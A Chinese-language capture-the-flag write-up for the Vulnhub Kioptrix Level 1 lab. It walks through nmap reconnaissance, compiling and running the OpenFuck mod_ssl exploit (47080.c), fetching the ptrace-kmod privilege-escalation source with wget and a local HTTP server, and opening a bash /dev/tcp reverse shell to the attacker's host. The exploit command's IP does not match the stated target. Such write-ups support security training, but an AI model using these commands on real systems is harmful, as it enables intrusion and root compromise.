【Vulnhub靶场通关】Kioptix Level 1

靶场下载地址

https://www.vulnhub.com/entry/kioptrix-level-1-1,22/

目标

本机IP:192.168.118.128

靶机IP:192.168.118.0/24

一、信息收集

1. 扫存活主机

javascript 复制代码
nmap -sP 192.168.118.0/24 

本机IP 为192.168.118.128

分析得靶机IP为 192.168.118.129

2. 扫全端口

javascript 复制代码
nmap -p- 192.168.118.129 

3. 服务详情扫描

javascript 复制代码
nmap -sV -A 192.168.118.129

发现开放的443端口,其中Apache/1.3.20,版本过低,可查找mod_ssl 漏洞

二、漏洞发现

1. 查找 mod_ssl 漏洞

javascript 复制代码
searchsploit mod_ssl

2. 漏洞版本

https://www.exploit-db.com(漏洞库)中查找,使用最新漏洞利用:

Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (2) unix/remote/47080.c

三、漏洞利用

1. 获取漏洞脚本

漏洞路径查询,当前路径查询,把脚本拷贝到当前桌面

bash 复制代码
locate unix/remote/47080.c

pwd

cp /usr/share/exploitdb/exploits/unix/remote/47080.c /root/Desktop

查看此脚本文件

发现需要安装相关依赖,编译,已给出相关利用指令

2. 使用脚本文件

安装依赖,编译

bash 复制代码
apt-get install libssl-dev

gcc -o 47080 47080.c -lcrypto

使用脚本文件

bash 复制代码
./文件名     显示文件使用说明

找到对应版本,尝试利用此脚本

bash 复制代码
./47080 0x6b 192.168.233.131 443 -c 40

此时发现已经得到 Shell ,输入 whami 尝试 ,发现只是普通用户

观察发现是 ptrace-kmod.c 文件获取失败

在给出的网址中下载 ptrace-kmod.c 到本地桌面,查看发现此文件为提权脚本文件

四、提权

1. kali 本机下载目标提权脚本

bash 复制代码
kali本机下载目标提权脚本:

wget https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c

2. 远程下载

在本地启动HTTP服务器,在目标中下载本地文件 ptrace-kmod.c并编译,然后重新利用漏洞,然后测试发现提权成功,获得root权限。

bash 复制代码
python -m http.server 80

wget 192.168.118.128/ptrace-kmod.c

3. Bash反弹Shell

bash 复制代码
nc -lvvp 6666

bash -i >& /dev/tcp/192.168.118.128/6666 0>&1
相关推荐
Sunset-_5 天前
[vulnhub] DarkHole: 1
web安全·网络安全·渗透测试
独行soc6 天前
#渗透测试#SRC漏洞挖掘# 操作系统-Linux系统基础02之Openssl、软连接与硬连接、用户账号数据库
linux·运维·服务器·面试·渗透测试
亿林数据8 天前
渗透测试专业名词解释
安全·web安全·网络安全·渗透测试
独行soc8 天前
#渗透测试#SRC漏洞挖掘#深入挖掘XSS漏洞02之测试流程
web安全·面试·渗透测试·xss·漏洞挖掘·1024程序员节
星尘安全8 天前
安全工程师入侵加密货币交易所获罪
安全·区块链·漏洞·加密货币
渗透测试老鸟-九青10 天前
【$15000】 通过监控调试模式实现RCE
安全·web安全·网络安全·渗透·漏洞
独行soc12 天前
#渗透测试#SRC漏洞挖掘#XSS跨站脚本介绍02绕过
程序人生·web安全·面试·渗透测试·1024程序员节
Sunset-_13 天前
[vulnhub]DC:7
web安全·网络安全·渗透测试
独行soc14 天前
#渗透测试#SRC漏洞挖掘# 信息收集-Shodan之搜索语法进阶
经验分享·学习·web安全·渗透测试·kali·shodan